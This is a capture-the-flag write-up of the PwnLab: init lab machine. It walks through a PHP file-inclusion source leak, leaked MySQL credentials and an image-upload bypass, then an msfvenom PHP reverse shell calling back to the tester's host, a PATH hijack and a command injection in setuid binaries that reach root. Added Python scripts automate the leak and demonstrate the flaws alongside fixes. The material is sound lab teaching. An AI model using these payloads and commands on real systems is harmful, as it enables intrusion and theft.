[Write-up]-pwnlab_init

About

  • Download link
  • Flag: /root/flag.txt
  • First day of the holiday
  • Bilibili video

Information gathering

nmap -sn 192.168.7.1/24 
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.1
Host is up (0.00071s latency).
Nmap scan report for 192.168.7.130
Host is up (0.00060s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.130
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44040/tcp  status
|_  100024  1          51756/udp  status
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 53
|   Version: .5.47-0+deb8u1
|   Thread ID: 84
|   Capabilities flags: 63487
|   Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient
|   Status: Autocommit
|_  Salt: "]0w'Xi((0XLS:j'"r<q

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds
  1. Ports 80 (Apache 2.4.10), 111 (rpcbind) and 3306 (MySQL 5.5.47) are open and the banners say Debian. rpcbind is of no use here, so start with the web app.
  2. The URLs follow a pattern: whatever comes after page= looks like a file name without an extension, which suggests the code appends one and includes the result:
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
}
?>

We guess that index.php does something like the above.

http://192.168.7.130/?page=login
http://192.168.7.130/?page=upload
  1. This looks like LFI (local file inclusion).
  2. Build the URL http://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login (the resource is given without .php because the include appends it).
  3. The include works: the php://filter wrapper base64-encodes the file instead of executing it, so the page returns the PHP source as a base64 blob. Decode it to get the file.
---login.php---

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);

	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
	$stmt->bind_param('ss', $luser, $lpass);

	$stmt->execute();
	$stmt->store_Result();

	if ($stmt->num_rows == 1)
	{
		$_SESSION['user'] = $luser;
		header('Location: ?page=upload');
	}
	else
	{
		echo "Login failed.";
	}
}
else
{
	?>
	<form action="" method="POST">
	<label>Username: </label><input id="user" type="test" name="user"><br />
	<label>Password: </label><input id="pass" type="password" name="pass"><br />
	<input type="submit" name="submit" value="Login">
	</form>
	<?php
}

  1. Next read config.php, which login.php pulls in with require:
<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
  1. While at it, also read index and upload:
---index---
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>

---upload---

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
	<body>
		<form action='' method='post' enctype='multipart/form-data'>
			<input type='file' name='file' id='file' />
			<input type='submit' name='submit' value='Upload'/>
		</form>
	</body>
</html>
<?php 
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png"); 

		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}

		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}

		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}

?>
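The four source dumps above all came from the php://filter trick described earlier. The script below automates it; it is an added example and not the write-up author's tooling. It assumes the target URL from the scan (http://192.168.7.130/) and, as index.php above shows, that the included output is wrapped in the page's own HTML, so the base64 blob has to be cut out of the response before decoding. The HTTP fetch is a pluggable function so the extraction logic can be exercised offline against a constructed response; `http_fetch` is what you would pass on a live run.

```python
"""Dump PHP sources through index.php's include() using php://filter.

Added example, not the write-up's own tooling. Target URL taken from the
scan; the response layout (nav links, <hr/><br/>, included output,
</center>) follows the index.php source dumped above.
"""
import base64
import re
import urllib.request

TARGET = "http://192.168.7.130/"
FILTER = "php://filter/convert.base64-encode/resource="

# Anything that looks like a base64 run of 16+ chars; the real blob is far
# longer than any token in the surrounding HTML, so the longest run wins.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def filter_url(base, page):
    """index.php does include($_GET['page'] . ".php"), so pass the bare
    name: the wrapper prefixes it and the server appends the extension."""
    return base + "?page=" + FILTER + page


def extract_source(html):
    """Cut the base64 blob out of the HTML-wrapped response and decode it.
    Returns None when no blob is present (include failed, wrong name, ...)."""
    blobs = B64_RUN.findall(html)
    if not blobs:
        return None
    try:
        raw = base64.b64decode(max(blobs, key=len), validate=True)
    except ValueError:
        return None
    return raw.decode("utf-8", "replace")


def dump_sources(fetch, base, pages):
    """fetch(url) -> str; returns {page: source} for every page that decoded."""
    found = {}
    for page in pages:
        src = extract_source(fetch(filter_url(base, page)))
        if src is not None:
            found[page] = src
    return found


def http_fetch(url):
    """Real fetch for a live run (not used by the offline demo below)."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode("utf-8", "replace")


# ---- constructed sample response (not captured from the target) ----------
SAMPLE_CONFIG = '<?php\n$server = "localhost";\n$username = "root";\n?>\n'
SAMPLE_RESPONSE = (
    "<html><body><center>\n"
    '[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ]\n'
    "<hr/><br/>\n"
    + base64.b64encode(SAMPLE_CONFIG.encode()).decode()
    + "</center></body></html>\n"
)


def fake_fetch(url):
    """Offline stand-in for http_fetch: only the config page 'exists'."""
    if url.endswith(FILTER + "config"):
        return SAMPLE_RESPONSE
    return "<html><body>nothing here</body></html>"


if __name__ == "__main__":
    for name, src in dump_sources(fake_fetch, TARGET, ["config", "index"]).items():
        print("--- %s.php ---\n%s" % (name, src))
```

On a live run replace `fake_fetch` with `http_fetch` and list the page names you found (login, config, index, upload). Picking the longest base64-looking run is deliberate: a short HTML token can never out-length a real source file, and a page that returned no blob (for example a name that does not exist) is reported as missing rather than decoded into garbage.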
  1. config.php gave us the MySQL root credentials, and the nmap scan already showed 3306 open to the network.
  2. mysql -h 192.168.7.130 -u root -D Users -p   (the password is the one from the base64-decoded config.php)
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.01 sec)
  1. login.php base64-encodes the submitted password before comparing it, so the pass column is just base64 of the plaintext. Decoded: kent:JWzXuBJJNy, mike:SIfdsTEn6I, kane:iSv5Ym2GRo.
  1. Log in and try an upload. From the source we know only image extensions are accepted, and both the client-sent Content-Type and the MIME type that getimagesize() detects from the file contents are checked as well.

Bypassing the upload filter

  • Method 1: prepend an image signature to the webshell. getimagesize() identifies the type from the leading magic bytes, so a file starting with GIF89a is reported as image/gif whatever follows, the .gif extension satisfies the whitelist, and the browser sends Content-Type image/gif for it on its own.
  1. echo GIF89a > kali.gif
  2. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >> kali.gif
  • Method 2: Burp Suite; you are all more practised with it than I am.
  1. After the upload the page returns the stored relative path, which is the MD5 of the original file name plus its extension: upload/51c65dd716e81189745d6eb1c9f1bb6b.gif
  2. Requesting it directly won't execute it (a .gif is served as a static image, not handed to PHP), but index.php has a second include whose path comes from the lang cookie: include("lang/".$_COOKIE['lang']). Nothing is appended there, so a path traversal to the .gif is enough and no null-byte trick is needed. Test it with /etc/passwd first:
  3. curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>
  1. It works. Replace ../../../../etc/passwd with the path of the uploaded webshell; lang/ sits next to upload/, so a single ../ reaches it:
  2. curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"
  3. The multi/handler listening on 192.168.7.1:7788 receives a session:
[*] Started reverse TCP handler on 192.168.7.1:7788 
[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800

meterpreter >

Privilege escalation

  1. The usual routine: upgrade to a tty with python -c 'import pty;pty.spawn("/bin/bash")', then try the database passwords against the local accounts with su (kent, mike and kane all appear in /etc/passwd above).
  2. kane's password works. In his home directory there is a setuid ELF owned by mike:
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
  1. It fails because the file in mike's home directory doesn't exist. Pull the binary back for analysis: start python -m SimpleHTTPServer in kane's home on the target and fetch 192.168.7.130:8000/msgmike from the attacking machine (the log below shows the requests arriving from 192.168.7.1):
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -
192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -
192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -
  1. In IDA the binary simply calls system("cat /home/mike/msg.txt"). system() runs that string through /bin/sh, and cat is given as a bare name, so the shell looks it up through PATH, which the caller controls.

  2. Point PATH at a directory of our own that contains a fake cat, and the "cat" turns into a shell:

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat  
echo "/bin/bash" > cat
kane@pwnlab:~$ ls
ls
cat  msgmike
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$ 
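The same PATH hijack, reproduced as an added example (not the write-up's code) so the mechanism can be checked without a setuid binary. It assumes what the IDA look above reports, a system("cat /home/mike/msg.txt") call, and runs that command line under a PATH of our choosing as the current user; it therefore shows the command resolution, not the uid change, which only the setuid bit provides.

```python
"""Reproduce the PATH hijack behind msgmike without the setuid bit.

Added example. msgmike (per the write-up's IDA look) does
system("cat /home/mike/msg.txt"); system() runs that line through
/bin/sh -c, and a bare "cat" is resolved through PATH, which belongs to
the caller. The demo builds a throwaway directory with a fake cat and runs
the same command line under PATH=<that dir>.
"""
import os
import subprocess
import tempfile


def system_with_path(command, path):
    """Mimic system(command) with a caller-controlled PATH; return stdout."""
    proc = subprocess.run(["/bin/sh", "-c", command],
                          env={"PATH": path}, capture_output=True, text=True)
    return proc.stdout.strip()


def path_hijack_demo():
    """Return (output with bare 'cat', output with absolute '/bin/cat')."""
    with tempfile.TemporaryDirectory() as d:
        fake_cat = os.path.join(d, "cat")
        with open(fake_cat, "w") as f:
            # The write-up's fake cat is a one-line file containing /bin/bash;
            # ours just announces itself so the result can be checked.
            f.write("#!/bin/sh\necho HIJACKED\n")
        os.chmod(fake_cat, 0o755)
        target = os.path.join(d, "msg.txt")      # absent, like /home/mike/msg.txt
        hijacked = system_with_path("cat " + target, d)
        # Hardening: an absolute path is not looked up in PATH (the real fix in
        # a setuid program is an absolute path or execve() without a shell,
        # plus a sanitised environment). stdout stays empty: real cat fails.
        safe = system_with_path("/bin/cat " + target, d)
        return hijacked, safe


if __name__ == "__main__":
    print(path_hijack_demo())
```

Two details from the transcript above fall out of this: the fake cat needs no shebang because sh runs a non-ELF file as a script, and the "dircolors: command not found" noise appears because PATH was reduced to /home/kane for the whole session, not just for the one command.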

  1. We are now mike. Restore PATH with export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin so normal commands work again (the "command not found" lines above are there because PATH was only /home/kane). mike's home directory holds another setuid binary, msg2root; in IDA it formats our input into "/bin/echo %s >> /root/messages.txt" and passes the result to system().
  2. The input is meant to be appended to the file, but it is spliced into a shell command line unquoted, so a separator such as ; ends the echo and whatever follows runs too, with the binary's root privileges. Spawn /bin/sh rather than bash: bash resets an effective uid that differs from the real uid unless started with -p, while Debian's /bin/sh (dash) keeps it, which is why id below shows uid=1002(mike) with euid=0(root).
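The injection, reproduced as an added example (not the challenge binary) against a temporary file so it runs unprivileged. It assumes the format string reported by IDA above and shows the non-shell fix beside the vulnerable pattern: the same "append a message" feature written with a file write instead of system(), where the separator is just another character.

```python
"""Reproduce msg2root's command injection and the non-shell fix.

Added example, not the challenge binary. msg2root formats the message into
"/bin/echo %s >> /root/messages.txt" and hands the string to system(); the
simulation below does the same against a temp file.
"""
import os
import subprocess
import tempfile


def msg2root_vulnerable(msg, logfile):
    """system("/bin/echo <msg> >> <logfile>"): msg becomes shell syntax."""
    command = "/bin/echo %s >> %s" % (msg, logfile)
    proc = subprocess.run(["/bin/sh", "-c", command],
                          capture_output=True, text=True)
    return proc.stdout.strip()


def msg2root_fixed(msg, logfile):
    """Same feature with no shell involved: the message is only ever data.
    (In the C binary this is fopen()/fputs(), or execve() with argv.)"""
    with open(logfile, "a") as f:
        f.write(msg + "\n")


def injection_demo():
    """Return (stdout of the vulnerable run, final log contents)."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "messages.txt")
        msg = "hello; echo INJECTED"
        shown = msg2root_vulnerable(msg, log)   # ';' ends the echo; 'echo INJECTED' runs
        msg2root_fixed(msg, log)                # whole string appended verbatim
        with open(log) as f:
            lines = f.read().splitlines()
        return shown, lines


if __name__ == "__main__":
    print(injection_demo())
```

Watch where the output goes in the vulnerable run: the >> redirect binds only to the last command of the assembled line, so "hello" is printed to the terminal and the injected command's output lands in the log file. The fixed variant writes the whole string, separator included, as one line.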
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id ; whoami
id ; whoami
id
root
mike@pwnlab:/home/mike$ 

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: asdasdasdas;/bin/sh
asdasdasdas;/bin/sh
asdasdasdas
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
cd /root
ls
flag.txt  messages.txt
cat flag.txt

.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
# 
posted @ 2020-01-19 08:52  三米前有蕉皮